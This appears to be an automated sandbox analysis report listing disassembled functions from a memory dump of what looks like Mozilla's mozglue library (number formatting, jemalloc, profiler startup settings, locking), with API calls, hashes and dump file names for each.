?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CB84E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CB84E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB84EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB84F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6CB84F1E

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: 734d2bc967e906f11e12aec7a0103e0c1c25b9c5ae33b32dbaf73e167b53e9e2
Instruction ID: 097e30fb24ae6f18e53eb3e88d7b6df0837fbe76fd80d89e7e6efdeec6216dbe
Opcode Fuzzy Hash: 734d2bc967e906f11e12aec7a0103e0c1c25b9c5ae33b32dbaf73e167b53e9e2
Instruction Fuzzy Hash: B241E0716097819FC705CF28C49095BBBE8FF89344F108A2DF46A97B41DB70E958CB92

Function 6CB91530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6CB9152B,?,?,?,?,6CB91248,?), ref: 6CB9159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6CB9152B,?,?,?,?,6CB91248,?), ref: 6CB915BC
moz_xmalloc.MOZGLUE(-00000001,?,6CB9152B,?,?,?,?,6CB91248,?), ref: 6CB915E7
free.MOZGLUE(?,?,?,?,?,?,6CB9152B,?,?,?,?,6CB91248,?), ref: 6CB91606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6CB9152B,?,?,?,?,6CB91248,?), ref: 6CB91637

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: 096847afcba115323234927aa69e84271ef1aef51c268b22797945047cad39bf
Instruction ID: 06d2aa8aa8a98790bcc6be6d589c295a8dd8f4e917202e0e97f423e927fa6218
Opcode Fuzzy Hash: 096847afcba115323234927aa69e84271ef1aef51c268b22797945047cad39bf
Instruction Fuzzy Hash: 3F31D672A041548BC7188E78D85046E77ADFB823647290B3DE823DBBD4EB30D9058792

Function 6CBEAD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6CBFE330,?,6CBAC059), ref: 6CBEAD9D

Part of subcall function 6CB9CA10: malloc.MOZGLUE(?), ref: 6CB9CA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6CBFE330,?,6CBAC059), ref: 6CBEADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6CBFE330,?,6CBAC059), ref: 6CBEAE01
GetLastError.KERNEL32(?,00000000,?,?,6CBFE330,?,6CBAC059), ref: 6CBEAE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6CBFE330,?,6CBAC059), ref: 6CBEAE3D

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: 042642e86bd9952ef1839abe31f436b8411a25f7cceb4fdae80042b935bbb8ff
Instruction ID: 43c74a7d688a5a7e7fa7c54586727aa7e11bfa65259abd0e36db00cc80cb24ca
Opcode Fuzzy Hash: 042642e86bd9952ef1839abe31f436b8411a25f7cceb4fdae80042b935bbb8ff
Instruction Fuzzy Hash: 633161B1A002559FDB10DF798C44AAFBBF8EF49654F15882DE85AE7700E734D804CBA0

Function 6CBE5EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6CBFDCA0,?,?,?,6CBBE8B5,00000000), ref: 6CBE5F1F
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CBBE8B5,00000000), ref: 6CBE5F4B
?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6CBBE8B5,00000000), ref: 6CBE5F7B
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6CBBE8B5,00000000), ref: 6CBE5F9F
?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CBBE8B5,00000000), ref: 6CBE5FD6

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
String ID:
API String ID: 1389714915-0
Opcode ID: 82a90a67affdf5794c63b651d1b5b96ce19313d7c10128c3425505d061e8f2d7
Instruction ID: 119253b551e7af55d9c6e93c9fc2665cab1e4e031ffa91fc28fd131e3cb5cd83
Opcode Fuzzy Hash: 82a90a67affdf5794c63b651d1b5b96ce19313d7c10128c3425505d061e8f2d7
Instruction Fuzzy Hash: E13149343006408FDB10CF29C898A2AB7F5FF89758B654568E5568BB95CB31EC45CB81

Function 6CB8B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6CB8B532
moz_xmalloc.MOZGLUE(?), ref: 6CB8B55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CB8B56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6CB8B57E
free.MOZGLUE(00000000), ref: 6CB8B58F

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 11d1bf20554c3966b66767817881b00badb0c36d71d7ea61c023b16594c4c57a
Instruction ID: 4c6c41f3ab9374cd148471a9b81aeb053b6f5bf03e429d0bd62ccfa97002df4d
Opcode Fuzzy Hash: 11d1bf20554c3966b66767817881b00badb0c36d71d7ea61c023b16594c4c57a
Instruction Fuzzy Hash: 1021E471A012459BDB008F68CC50BAEBBB9FF46304F284129E818DB381E736DD15C7A1

Function 6CBE76C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 6CBE76F2
moz_xmalloc.MOZGLUE(00000001), ref: 6CBE7705

Part of subcall function 6CB9CA10: malloc.MOZGLUE(?), ref: 6CB9CA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CBE7717
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6CBE778F,00000000,00000000,00000000,00000000), ref: 6CBE7731
free.MOZGLUE(00000000), ref: 6CBE7760

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 2538299546-0
Opcode ID: a17dbe1097261fc7a1a271e9751433639982387742b61a4c2bf6da05ab7b2109
Instruction ID: 892938f6b5d3d6d4cf32dbfe1ce810c1736133a7005dd153dcf2db92d1eb91b1
Opcode Fuzzy Hash: a17dbe1097261fc7a1a271e9751433639982387742b61a4c2bf6da05ab7b2109
Instruction Fuzzy Hash: 1111E6B19052556BD710AFB68C44B6FBFF8EF49754F144429F848A7300F371884487E2

Function 6CBC0D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6CB83DEF), ref: 6CBC0D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6CB83DEF), ref: 6CBC0D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6CB83DEF), ref: 6CBC0DAF

Strings

: (malloc) Error in VirtualFree(), xrefs: 6CBC0D97, 6CBC0DBE
<jemalloc>, xrefs: 6CBC0D92, 6CBC0DB9

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: db1b42ab1f9b3a5be6cf61fc9faec0b6d4b0ef884d558739ad483aad9f6fcfde
Instruction ID: e0e4d6861edf0a303c747ed10946f3fb0374b00c97097b52d7da71a9aae12bc2
Opcode Fuzzy Hash: db1b42ab1f9b3a5be6cf61fc9faec0b6d4b0ef884d558739ad483aad9f6fcfde
Instruction Fuzzy Hash: 2BF0E9B13847E423E620626A6C0AB5B266DEBC2B64F314135FA14DF9C0EF51E80046A7

Function 6CBD7620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6CBD75C4,?), ref: 6CBD762B

Part of subcall function 6CB9CA10: malloc.MOZGLUE(?), ref: 6CB9CA26

InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6CBD74D7,6CBE15FC,?,?,?), ref: 6CBD7644
GetCurrentThreadId.KERNEL32 ref: 6CBD765A
AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6CBD74D7,6CBE15FC,?,?,?), ref: 6CBD7663
ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6CBD74D7,6CBE15FC,?,?,?), ref: 6CBD7677

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
String ID:
API String ID: 418114769-0
Opcode ID: 20b5defd89c0317722df158f1fb6124b0aeb7d7a2bf4b65d8cc8ade01b645043
Instruction ID: 431eb0bfc576d35fd78d1ddc346dd98038a47923fcb89a2fbcbe726bb137a4ce
Opcode Fuzzy Hash: 20b5defd89c0317722df158f1fb6124b0aeb7d7a2bf4b65d8cc8ade01b645043
Instruction Fuzzy Hash: 0EF0AF71E10786ABD700CF21C898676B778FFEB259F22531AF90442601E7B1A5D08BD0

Function 6CBAD468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6CBBCBE8: GetCurrentProcess.KERNEL32(?,6CB831A7), ref: 6CBBCBF1
Part of subcall function 6CBBCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CB831A7), ref: 6CBBCBFA

EnterCriticalSection.KERNEL32(6CC0E784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6CBBD1C5), ref: 6CBAD4F2
LeaveCriticalSection.KERNEL32(6CC0E784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6CBBD1C5), ref: 6CBAD50B

Part of subcall function 6CB8CFE0: EnterCriticalSection.KERNEL32(6CC0E784), ref: 6CB8CFF6
Part of subcall function 6CB8CFE0: LeaveCriticalSection.KERNEL32(6CC0E784), ref: 6CB8D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6CBBD1C5), ref: 6CBAD52E
EnterCriticalSection.KERNEL32(6CC0E7DC), ref: 6CBAD690
LeaveCriticalSection.KERNEL32(6CC0E784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6CBBD1C5), ref: 6CBAD751

Strings

MOZ_CRASH(), xrefs: 6CBAD4BB

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: ebfac9d01313890b437b1b7423bb9e21168107c5b643fe6f5c00675452be239a
Instruction ID: ebd7b441c1116607c9a12a76cc76a78b7bae7d2df677412edde114a085a16a67
Opcode Fuzzy Hash: ebfac9d01313890b437b1b7423bb9e21168107c5b643fe6f5c00675452be239a
Instruction Fuzzy Hash: 8B51F171B087818FD328CF68C09075AB7F1EB89304F154A2ED9A9C7B85EB31A841CB52

Function 6CBD4630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6CBD4721

Strings

profiler-paused, xrefs: 6CBD46E4
., xrefs: 6CBD476A
-%llu, xrefs: 6CBD4733

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: __aulldiv
String ID: -%llu$.$profiler-paused
API String ID: 3732870572-2661126502
Opcode ID: e88e8181d330e561869965e33764692ea97a51fe675574988d96f857acc66898
Instruction ID: eefc1fa81c3c2c375efeaee845bf36746bab81ca3937949105de065ce8b8b8f2
Opcode Fuzzy Hash: e88e8181d330e561869965e33764692ea97a51fe675574988d96f857acc66898
Instruction Fuzzy Hash: F9415571F047489BCB08CF78E85115EBBF5EF85344F11863DE855A7B41EB30A8458B42

Function 6CBD46E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6CBD4721

Part of subcall function 6CB84410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6CBC3EBD,00000017,?,00000000,?,6CBC3EBD,?,?,6CB842D2), ref: 6CB84444

Strings

profiler-paused, xrefs: 6CBD46E4
., xrefs: 6CBD476A
-%llu, xrefs: 6CBD4733

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: __aulldiv__stdio_common_vsprintf
String ID: -%llu$.$profiler-paused
API String ID: 680628322-2661126502
Opcode ID: b8c2957695873827fdb2cc9f96b79bbe167dd8f2b896ac3334a5164e24928961
Instruction ID: cc3aada4ab98c45e099b701904b2b26b090d49f68cc47bca4c38fbf789eba274
Opcode Fuzzy Hash: b8c2957695873827fdb2cc9f96b79bbe167dd8f2b896ac3334a5164e24928961
Instruction Fuzzy Hash: D5310975F042485BCB0CCF6CD8916AEBBE6DB99314F15453DE8059B741EB70A844CF51

Function 6CBDB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB84290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CBC3EBD,6CBC3EBD,00000000), ref: 6CB842A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CBDB127), ref: 6CBDB463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CBDB4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6CBDB4E4

Strings

pid:, xrefs: 6CBDB4DE

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: 1b5f41dee85a1191d6050eeb25b08b4c437b6451bb7c0119184c746d9e290934
Instruction ID: eebd898650009f32cf8d54dae4f80ec9ba4c36a2d6a53ad3a2b2e310477e7d5f
Opcode Fuzzy Hash: 1b5f41dee85a1191d6050eeb25b08b4c437b6451bb7c0119184c746d9e290934
Instruction Fuzzy Hash: 8D311231A012488BDB00DFA9D880AEEB7B5FF09319F56052DD81167A40D732F949CFA2

Function 6CBCE550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CBCE577
AcquireSRWLockExclusive.KERNEL32(6CC0F4B8), ref: 6CBCE584
ReleaseSRWLockExclusive.KERNEL32(6CC0F4B8), ref: 6CBCE5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CBCE8A6

Strings

MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6CBCE777
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6CBCE722, 6CBCE750, 6CBCE7A2
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6CBCE655
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6CBCE826, 6CBCE850
MOZ_PROFILER_STARTUP, xrefs: 6CBCE5A1, 6CBCE5CC, 6CBCE5FF, 6CBCE62A

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: 61fe4b857d70ee34a146973b916b54e449b58659f30de08f55a4eecb8086f9ce
Instruction ID: 75f552c67a5384a21dda9a1257c8e450446094ae3d64edb209674f018affd709
Opcode Fuzzy Hash: 61fe4b857d70ee34a146973b916b54e449b58659f30de08f55a4eecb8086f9ce
Instruction Fuzzy Hash: 3A118E31B04294DFCB00DF54C489A6ABBB4FB89368F02061DFC5557A50D772A845CFA6

Function 6CBD0C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CBD0CD5

Part of subcall function 6CBBF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CBBF9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CBD0D40
free.MOZGLUE ref: 6CBD0DCB

Part of subcall function 6CBA5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CBA5EDB
Part of subcall function 6CBA5E90: memset.VCRUNTIME140(6CBE7765,000000E5,55CCCCCC), ref: 6CBA5F27
Part of subcall function 6CBA5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CBA5FB2

free.MOZGLUE ref: 6CBD0DDD
free.MOZGLUE ref: 6CBD0DF2

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: bb8e118840cd7afb1a4bd3c413399cb7d995af6da42e84bd38db16c23dbf8e73
Instruction ID: 97f9f0cbf42c7fbaae6422f45ac2b86812fbe8014a8ee4b8fc1bd3d0f4f81667
Opcode Fuzzy Hash: bb8e118840cd7afb1a4bd3c413399cb7d995af6da42e84bd38db16c23dbf8e73
Instruction Fuzzy Hash: 92412575A087908BD320CF29D08079EFBE5FF99654F118A2EE8D887710D770A589CB92

Function 6CBDCCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6CBCDA31,00100000,?,?,00000000,?), ref: 6CBDCDA4

Part of subcall function 6CB9CA10: malloc.MOZGLUE(?), ref: 6CB9CA26

Part of subcall function 6CBDD130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6CBDCDBA,00100000,?,00000000,?,6CBCDA31,00100000,?,?,00000000,?), ref: 6CBDD158
Part of subcall function 6CBDD130: InitializeConditionVariable.KERNEL32(00000098,?,6CBDCDBA,00100000,?,00000000,?,6CBCDA31,00100000,?,?,00000000,?), ref: 6CBDD177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6CBCDA31,00100000,?,?,00000000,?), ref: 6CBDCDC4

Part of subcall function 6CBD7480: ReleaseSRWLockExclusive.KERNEL32(?,6CBE15FC,?,?,?,?,6CBE15FC,?), ref: 6CBD74EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6CBCDA31,00100000,?,?,00000000,?), ref: 6CBDCECC

Part of subcall function 6CB9CA10: mozalloc_abort.MOZGLUE(?), ref: 6CB9CAA2

Part of subcall function 6CBCCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6CBDCEEA,?,?,?,?,00000000,?,6CBCDA31,00100000,?,?,00000000), ref: 6CBCCB57
Part of subcall function 6CBCCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6CBCCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6CBDCEEA,?,?), ref: 6CBCCBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6CBCDA31,00100000,?,?,00000000,?), ref: 6CBDD058

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

